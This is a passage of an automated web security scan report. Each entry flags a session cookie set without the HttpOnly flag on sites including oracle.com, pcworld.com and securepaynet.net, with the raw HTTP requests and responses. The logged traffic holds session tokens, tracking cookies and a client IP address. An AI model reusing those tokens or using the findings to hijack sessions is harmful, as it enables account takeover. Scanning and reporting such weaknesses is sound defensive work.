Set-Cookie: PHPSESSID=fbb3b93f7303ec3062b1cef62bec6e33; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 26

No link for security/eset

18.139. http://www.oracle.com/webapps/dialogue/ns/dlgwelcome.jsp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.oracle.com
Path:   /webapps/dialogue/ns/dlgwelcome.jsp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /webapps/dialogue/ns/dlgwelcome.jsp?p_ext=Y&p_dlg_id=8834744&src=7054579&Act=9&sckw=WWMK10058753MPP001.GCM.8100.110 HTTP/1.1
Host: www.oracle.com
Proxy-Connection: keep-alive
Referer: http://www.oracle.com/pls/www/go.lp?kw=&Src=7054579&Act=9&SC=sckw=WWMK10058753MPP001.GCM.8100.110
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: Oracle-Application-Server-10g/10.1.3.4.0 Oracle-HTTP-Server
Content-Type: text/html;charset=utf-8
Vary: Accept-Encoding
Date: Sun, 24 Apr 2011 19:45:39 GMT
Connection: close
Set-Cookie: JSESSIONID=2e63fae3eb91f5fc5259bf707b004df90622e3ad401be1a214b18c793ce79d23.e3yTa3qTahyRe3uRb3aSchyTby0; path=/webapps/dialogue
Content-Length: 11659

<!-- ver 1.1 -->


<SCRIPT src="form.js" language="Javascript"></SCRIPT>

<!-- VKUMAR
<SCRIPT language='JavaScript' src='http://www.oracle.com/admin/jscripts/lib.js'></SCRIPT>
<sc
...[SNIP]...

18.140. http://www.pcworld.com/articleComment/get.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.pcworld.com
Path:   /articleComment/get.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /articleComment/get.do?threadId=36292&style=default&ord=3987850 HTTP/1.1
Host: www.pcworld.com
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/149142/identity_theft_monitoring_services_called_waste.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=205278865.1910705707.1303674274.1303674274.1303674274.1; __utmb=205278865; __utmc=205278865; __utmz=205278865.1303674274.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); pcw.last_uri=/article/149142/identity_theft_monitoring_services_called_waste.html; fsr.a=1303674275599

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:48:35 GMT
Server: Apache
X-GasHost: gas2
X-Cooking-With: Gasoline-Proxy
X-GasOriginRetry: 0
X-GasOriginTime: 0
Content-Type: text/xml;charset=UTF-8
Set-Cookie: JSESSIONID=74FEB342701A0514AA7330E7EA4CD806; Path=/
Vary: Accept-Encoding
Content-Length: 330


<taconite>
   <hide select="#postingMessage" />
   <replaceContent select="#commentContainer">
   
   <ul id="commentList">
       
       
   </ul> <!-- END #commentList -->
   
   </replaceContent>
   
   <replac
...[SNIP]...

18.141. http://www.pcworld.com/articleVote/get.do  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.pcworld.com
Path:   /articleVote/get.do

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /articleVote/get.do?aid=149142&style=default HTTP/1.1
Host: www.pcworld.com
Proxy-Connection: keep-alive
Referer: http://www.pcworld.com/article/149142/identity_theft_monitoring_services_called_waste.html
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=205278865.1910705707.1303674274.1303674274.1303674274.1; __utmb=205278865; __utmc=205278865; __utmz=205278865.1303674274.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); pcw.last_uri=/article/149142/identity_theft_monitoring_services_called_waste.html; fsr.a=1303674275599

Response

HTTP/1.1 200 OK
Date: Sun, 24 Apr 2011 19:48:06 GMT
Server: Apache
X-GasHost: gas1
X-Cooking-With: Gasoline-Proxy
X-GasOriginRetry: 0
X-GasOriginTime: 0
Content-Type: text/xml;charset=UTF-8
Set-Cookie: JSESSIONID=F74E8DDE8E9A987611C0CEA84C2B9359; Path=/
Vary: Accept-Encoding
Content-Length: 212


<taconite>
   
   <replaceContent select="#voteTallyYes">28</replaceContent>
   <replaceContent select="#voteTallyNo">5</replaceContent>
   <replaceContent select="#voteYesBottom">28</replaceContent>
<
...[SNIP]...

18.142. http://www.reputationengineer.com/internet-reputation-management/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.reputationengineer.com
Path:   /internet-reputation-management/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /internet-reputation-management/?gclid=CN-bzOa1tqgCFYbb4AodHHmKBw HTTP/1.1
Host: www.reputationengineer.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 00:37:04 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.15
X-Pingback: http://www.reputationengineer.com/xmlrpc.php
Set-Cookie: PHPSESSID=1433347768753da3e21154d1e825a93a; path=/
Content-Type: text/html; charset=UTF-8
Content-Length: 29051

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head profile="http://gmpg.org/x
...[SNIP]...

18.143. http://www.securepaynet.net/gdshop/account/exec.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.securepaynet.net
Path:   /gdshop/account/exec.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gdshop/account/exec.asp HTTP/1.1
Host: www.securepaynet.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: pathway=a18897dc-5bf3-427c-af7e-723b41dc410f; adc471557=US; __utmz=1.1303648053.1.1.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/pub/banner_728_90_random.php; flag471557=cflag=us; visitor=vid=a18897dc-5bf3-427c-af7e-723b41dc410f; app_pathway=; actioncount=; SplitValue471557=30; SiteWidth471557=1000; traffic=cookies=1&referrer=http://www.securepaynet.net/default.aspx?isc=kro_2011&ci=1767&prog_id=indextonet&sitename=www.securepaynet.net&page=/external/json/SalesBanner.aspx&server=M1PWCORPWEB197&status=200 OK&querystring=layout=Sidebar&isc=kro_2011&targetDivId=ctl00_sidebarController_SidebarBanner_pnlSalesBanner&prog_id=indextonet&callback=jsonp1303648053058&_=1303648053496&shopper=&privatelabelid=471557&isc=kro_2011&clientip=173.193.214.243&referringpath=&referringdomain=&split=30; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; isc=kro_2011; pagecount=1; currency471557=potableSourceStr=USD; __utma=1.1286408685.1303648053.1303648053.1303648053.1; __utmc=1; ASP.NET_SessionId=pbyt3z45y25hu0mc0j4lts45; __utmb=1.1.10.1303648053; currencypopin471557=cdisplaypopin=false;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Expires: Sun, 17 Apr 2011 18:12:47 GMT
Location: /account/accountexec.aspx
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDAAQRCDBS=FLGGDDNBCBIEMBAINMENPKJD; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sun, 24 Apr 2011 16:52:47 GMT
Connection: close


18.144. http://www.securepaynet.net/gdshop/helpcenter.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.securepaynet.net
Path:   /gdshop/helpcenter.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gdshop/helpcenter.asp HTTP/1.1
Host: www.securepaynet.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: pathway=a18897dc-5bf3-427c-af7e-723b41dc410f; adc471557=US; __utmz=1.1303648053.1.1.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/pub/banner_728_90_random.php; flag471557=cflag=us; visitor=vid=a18897dc-5bf3-427c-af7e-723b41dc410f; app_pathway=; actioncount=; SplitValue471557=30; SiteWidth471557=1000; traffic=cookies=1&referrer=http://www.securepaynet.net/default.aspx?isc=kro_2011&ci=1767&prog_id=indextonet&sitename=www.securepaynet.net&page=/external/json/SalesBanner.aspx&server=M1PWCORPWEB197&status=200 OK&querystring=layout=Sidebar&isc=kro_2011&targetDivId=ctl00_sidebarController_SidebarBanner_pnlSalesBanner&prog_id=indextonet&callback=jsonp1303648053058&_=1303648053496&shopper=&privatelabelid=471557&isc=kro_2011&clientip=173.193.214.243&referringpath=&referringdomain=&split=30; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; isc=kro_2011; pagecount=1; currency471557=potableSourceStr=USD; __utma=1.1286408685.1303648053.1303648053.1303648053.1; __utmc=1; ASP.NET_SessionId=pbyt3z45y25hu0mc0j4lts45; __utmb=1.1.10.1303648053; currencypopin471557=cdisplaypopin=false;

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache
Content-Length: 169
Content-Type: text/html
Expires: Sun, 17 Apr 2011 18:10:56 GMT
Location: https://www.securepaynet.net/gdshop/404error.asp
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDAAQRCDBS=BCFFDDNBAHAAKLOIJKFADACK; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sun, 24 Apr 2011 16:50:55 GMT
Connection: close

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="https://www.securepaynet.net/gdshop/404error.asp">here</a>.</body>

18.145. http://www.securepaynet.net/gdshop/icann/domain_search.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.securepaynet.net
Path:   /gdshop/icann/domain_search.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gdshop/icann/domain_search.asp HTTP/1.1
Host: www.securepaynet.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: pathway=a18897dc-5bf3-427c-af7e-723b41dc410f; adc471557=US; __utmz=1.1303648053.1.1.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/pub/banner_728_90_random.php; flag471557=cflag=us; visitor=vid=a18897dc-5bf3-427c-af7e-723b41dc410f; app_pathway=; actioncount=; SplitValue471557=30; SiteWidth471557=1000; traffic=cookies=1&referrer=http://www.securepaynet.net/default.aspx?isc=kro_2011&ci=1767&prog_id=indextonet&sitename=www.securepaynet.net&page=/external/json/SalesBanner.aspx&server=M1PWCORPWEB197&status=200 OK&querystring=layout=Sidebar&isc=kro_2011&targetDivId=ctl00_sidebarController_SidebarBanner_pnlSalesBanner&prog_id=indextonet&callback=jsonp1303648053058&_=1303648053496&shopper=&privatelabelid=471557&isc=kro_2011&clientip=173.193.214.243&referringpath=&referringdomain=&split=30; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; isc=kro_2011; pagecount=1; currency471557=potableSourceStr=USD; __utma=1.1286408685.1303648053.1303648053.1303648053.1; __utmc=1; ASP.NET_SessionId=pbyt3z45y25hu0mc0j4lts45; __utmb=1.1.10.1303648053; currencypopin471557=cdisplaypopin=false;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Expires: Sun, 17 Apr 2011 18:10:55 GMT
Location: /icann/domain_search.aspx
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDAAQRCDBS=MBFFDDNBMFKANLOLNEEAIEKK; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sun, 24 Apr 2011 16:50:55 GMT
Connection: close


18.146. http://www.securepaynet.net/gdshop/myportal/consolidate.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.securepaynet.net
Path:   /gdshop/myportal/consolidate.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gdshop/myportal/consolidate.asp HTTP/1.1
Host: www.securepaynet.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: pathway=a18897dc-5bf3-427c-af7e-723b41dc410f; adc471557=US; __utmz=1.1303648053.1.1.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/pub/banner_728_90_random.php; flag471557=cflag=us; visitor=vid=a18897dc-5bf3-427c-af7e-723b41dc410f; app_pathway=; actioncount=; SplitValue471557=30; SiteWidth471557=1000; traffic=cookies=1&referrer=http://www.securepaynet.net/default.aspx?isc=kro_2011&ci=1767&prog_id=indextonet&sitename=www.securepaynet.net&page=/external/json/SalesBanner.aspx&server=M1PWCORPWEB197&status=200 OK&querystring=layout=Sidebar&isc=kro_2011&targetDivId=ctl00_sidebarController_SidebarBanner_pnlSalesBanner&prog_id=indextonet&callback=jsonp1303648053058&_=1303648053496&shopper=&privatelabelid=471557&isc=kro_2011&clientip=173.193.214.243&referringpath=&referringdomain=&split=30; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; isc=kro_2011; pagecount=1; currency471557=potableSourceStr=USD; __utma=1.1286408685.1303648053.1303648053.1303648053.1; __utmc=1; ASP.NET_SessionId=pbyt3z45y25hu0mc0j4lts45; __utmb=1.1.10.1303648053; currencypopin471557=cdisplaypopin=false;

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache
Content-Length: 169
Content-Type: text/html
Expires: Sun, 17 Apr 2011 18:11:00 GMT
Location: https://www.securepaynet.net/gdshop/404error.asp
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDAAQRCDBS=NHFFDDNBEILJELMJMMNMODDN; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sun, 24 Apr 2011 16:50:59 GMT
Connection: close

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="https://www.securepaynet.net/gdshop/404error.asp">here</a>.</body>

18.147. http://www.securepaynet.net/gdshop/myportal/domainren.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.securepaynet.net
Path:   /gdshop/myportal/domainren.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gdshop/myportal/domainren.asp HTTP/1.1
Host: www.securepaynet.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: pathway=a18897dc-5bf3-427c-af7e-723b41dc410f; adc471557=US; __utmz=1.1303648053.1.1.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/pub/banner_728_90_random.php; flag471557=cflag=us; visitor=vid=a18897dc-5bf3-427c-af7e-723b41dc410f; app_pathway=; actioncount=; SplitValue471557=30; SiteWidth471557=1000; traffic=cookies=1&referrer=http://www.securepaynet.net/default.aspx?isc=kro_2011&ci=1767&prog_id=indextonet&sitename=www.securepaynet.net&page=/external/json/SalesBanner.aspx&server=M1PWCORPWEB197&status=200 OK&querystring=layout=Sidebar&isc=kro_2011&targetDivId=ctl00_sidebarController_SidebarBanner_pnlSalesBanner&prog_id=indextonet&callback=jsonp1303648053058&_=1303648053496&shopper=&privatelabelid=471557&isc=kro_2011&clientip=173.193.214.243&referringpath=&referringdomain=&split=30; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; isc=kro_2011; pagecount=1; currency471557=potableSourceStr=USD; __utma=1.1286408685.1303648053.1303648053.1303648053.1; __utmc=1; ASP.NET_SessionId=pbyt3z45y25hu0mc0j4lts45; __utmb=1.1.10.1303648053; currencypopin471557=cdisplaypopin=false;

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache
Content-Length: 169
Content-Type: text/html
Expires: Tue, 24 Apr 2001 07:00:00 GMT
Location: https://www.securepaynet.net/gdshop/404error.asp
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDAAQRCDBS=HFFFDDNBGOANEAKHNOIMIJFF; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sun, 24 Apr 2011 16:50:58 GMT
Connection: close

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="https://www.securepaynet.net/gdshop/404error.asp">here</a>.</body>

18.148. http://www.securepaynet.net/gdshop/myportal/hostingren.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.securepaynet.net
Path:   /gdshop/myportal/hostingren.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gdshop/myportal/hostingren.asp HTTP/1.1
Host: www.securepaynet.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: pathway=a18897dc-5bf3-427c-af7e-723b41dc410f; adc471557=US; __utmz=1.1303648053.1.1.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/pub/banner_728_90_random.php; flag471557=cflag=us; visitor=vid=a18897dc-5bf3-427c-af7e-723b41dc410f; app_pathway=; actioncount=; SplitValue471557=30; SiteWidth471557=1000; traffic=cookies=1&referrer=http://www.securepaynet.net/default.aspx?isc=kro_2011&ci=1767&prog_id=indextonet&sitename=www.securepaynet.net&page=/external/json/SalesBanner.aspx&server=M1PWCORPWEB197&status=200 OK&querystring=layout=Sidebar&isc=kro_2011&targetDivId=ctl00_sidebarController_SidebarBanner_pnlSalesBanner&prog_id=indextonet&callback=jsonp1303648053058&_=1303648053496&shopper=&privatelabelid=471557&isc=kro_2011&clientip=173.193.214.243&referringpath=&referringdomain=&split=30; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; isc=kro_2011; pagecount=1; currency471557=potableSourceStr=USD; __utma=1.1286408685.1303648053.1303648053.1303648053.1; __utmc=1; ASP.NET_SessionId=pbyt3z45y25hu0mc0j4lts45; __utmb=1.1.10.1303648053; currencypopin471557=cdisplaypopin=false;

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache
Content-Length: 169
Content-Type: text/html
Expires: Tue, 24 Apr 2001 07:00:00 GMT
Location: https://www.securepaynet.net/gdshop/404error.asp
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDAAQRCDBS=LKFFDDNBFFBAONEODDLJBDNE; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sun, 24 Apr 2011 16:51:01 GMT
Connection: close

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="https://www.securepaynet.net/gdshop/404error.asp">here</a>.</body>

18.149. http://www.securepaynet.net/gdshop/myportal/itemren.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.securepaynet.net
Path:   /gdshop/myportal/itemren.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gdshop/myportal/itemren.asp HTTP/1.1
Host: www.securepaynet.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: pathway=a18897dc-5bf3-427c-af7e-723b41dc410f; adc471557=US; __utmz=1.1303648053.1.1.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/pub/banner_728_90_random.php; flag471557=cflag=us; visitor=vid=a18897dc-5bf3-427c-af7e-723b41dc410f; app_pathway=; actioncount=; SplitValue471557=30; SiteWidth471557=1000; traffic=cookies=1&referrer=http://www.securepaynet.net/default.aspx?isc=kro_2011&ci=1767&prog_id=indextonet&sitename=www.securepaynet.net&page=/external/json/SalesBanner.aspx&server=M1PWCORPWEB197&status=200 OK&querystring=layout=Sidebar&isc=kro_2011&targetDivId=ctl00_sidebarController_SidebarBanner_pnlSalesBanner&prog_id=indextonet&callback=jsonp1303648053058&_=1303648053496&shopper=&privatelabelid=471557&isc=kro_2011&clientip=173.193.214.243&referringpath=&referringdomain=&split=30; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; isc=kro_2011; pagecount=1; currency471557=potableSourceStr=USD; __utma=1.1286408685.1303648053.1303648053.1303648053.1; __utmc=1; ASP.NET_SessionId=pbyt3z45y25hu0mc0j4lts45; __utmb=1.1.10.1303648053; currencypopin471557=cdisplaypopin=false;

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache
Content-Length: 169
Content-Type: text/html
Expires: Sun, 17 Apr 2011 18:11:04 GMT
Location: https://www.securepaynet.net/gdshop/404error.asp
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDAAQRCDBS=CAGFDDNBBLHLNCDEPCCJHFGC; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sun, 24 Apr 2011 16:51:03 GMT
Connection: close

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="https://www.securepaynet.net/gdshop/404error.asp">here</a>.</body>

18.150. http://www.securepaynet.net/gdshop/site_log_out.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.securepaynet.net
Path:   /gdshop/site_log_out.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gdshop/site_log_out.asp HTTP/1.1
Host: www.securepaynet.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: pathway=a18897dc-5bf3-427c-af7e-723b41dc410f; adc471557=US; __utmz=1.1303648053.1.1.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/pub/banner_728_90_random.php; flag471557=cflag=us; visitor=vid=a18897dc-5bf3-427c-af7e-723b41dc410f; app_pathway=; actioncount=; SplitValue471557=30; SiteWidth471557=1000; traffic=cookies=1&referrer=http://www.securepaynet.net/default.aspx?isc=kro_2011&ci=1767&prog_id=indextonet&sitename=www.securepaynet.net&page=/external/json/SalesBanner.aspx&server=M1PWCORPWEB197&status=200 OK&querystring=layout=Sidebar&isc=kro_2011&targetDivId=ctl00_sidebarController_SidebarBanner_pnlSalesBanner&prog_id=indextonet&callback=jsonp1303648053058&_=1303648053496&shopper=&privatelabelid=471557&isc=kro_2011&clientip=173.193.214.243&referringpath=&referringdomain=&split=30; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; isc=kro_2011; pagecount=1; currency471557=potableSourceStr=USD; __utma=1.1286408685.1303648053.1303648053.1303648053.1; __utmc=1; ASP.NET_SessionId=pbyt3z45y25hu0mc0j4lts45; __utmb=1.1.10.1303648053; currencypopin471557=cdisplaypopin=false;

Response

HTTP/1.1 302 Object moved
Cache-Control: no-cache
Content-Length: 169
Content-Type: text/html
Expires: Sat, 23 Apr 2011 16:50:46 GMT
Location: https://www.securepaynet.net/gdshop/404error.asp
Server: Microsoft-IIS/7.5
Set-Cookie: ASPSESSIONIDAAQRCDBS=JMEFDDNBMKIIAAJAJOAJOLOD; path=/
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3p.xml", CP="COM CNT DEM FIN GOV INT NAV ONL PHY PRE PUR STA UNI IDC CAO OTI DSP COR CUR i OUR IND"
Date: Sun, 24 Apr 2011 16:50:47 GMT
Connection: close

<head><title>Object moved</title></head>
<body><h1>Object Moved</h1>This object may be found <a HREF="https://www.securepaynet.net/gdshop/404error.asp">here</a>.</body>

18.151. http://www.securepaynet.net/gdshop/support.asp  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.securepaynet.net
Path:   /gdshop/support.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gdshop/support.asp HTTP/1.1
Host: www.securepaynet.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: pathway=a18897dc-5bf3-427c-af7e-723b41dc410f; adc471557=US; __utmz=1.1303648053.1.1.utmcsr=kroogy.com|utmccn=(referral)|utmcmd=referral|utmcct=/pub/banner_728_90_random.php; flag471557=cflag=us; visitor=vid=a18897dc-5bf3-427c-af7e-723b41dc410f; app_pathway=; actioncount=; SplitValue471557=30; SiteWidth471557=1000; traffic=cookies=1&referrer=http://www.securepaynet.net/default.aspx?isc=kro_2011&ci=1767&prog_id=indextonet&sitename=www.securepaynet.net&page=/external/json/SalesBanner.aspx&server=M1PWCORPWEB197&status=200 OK&querystring=layout=Sidebar&isc=kro_2011&targetDivId=ctl00_sidebarController_SidebarBanner_pnlSalesBanner&prog_id=indextonet&callback=jsonp1303648053058&_=1303648053496&shopper=&privatelabelid=471557&isc=kro_2011&clientip=173.193.214.243&referringpath=&referringdomain=&split=30; fbiTrafficSettings=cDepth=16&resX=1920&resY=1200&fMajorVer=-1&fMinorVer=-1&slMajorVer=-1&slMinorVer=-1; isc=kro_2011; pagecount=1; currency471557=potableSourceStr=USD; __utma=1.1286408685.1303648053.1303648053.1303648053.1; __utmc=1; ASP.NET_SessionId=pbyt3z45y25hu0mc0j4lts45; __utmb=1.1.10.1303648053; currencypopin471557=cdisplaypopin=false;

Response

HTTP/1.1 301 Moved Permanently
Cache-Control: private
Content-Length: 0
Content-Type: text/html
Expires: Sun, 17 Apr 2011 18:10:46 GMT
Location: /support/support.aspx
Server: Microsoft-IIS/7.5
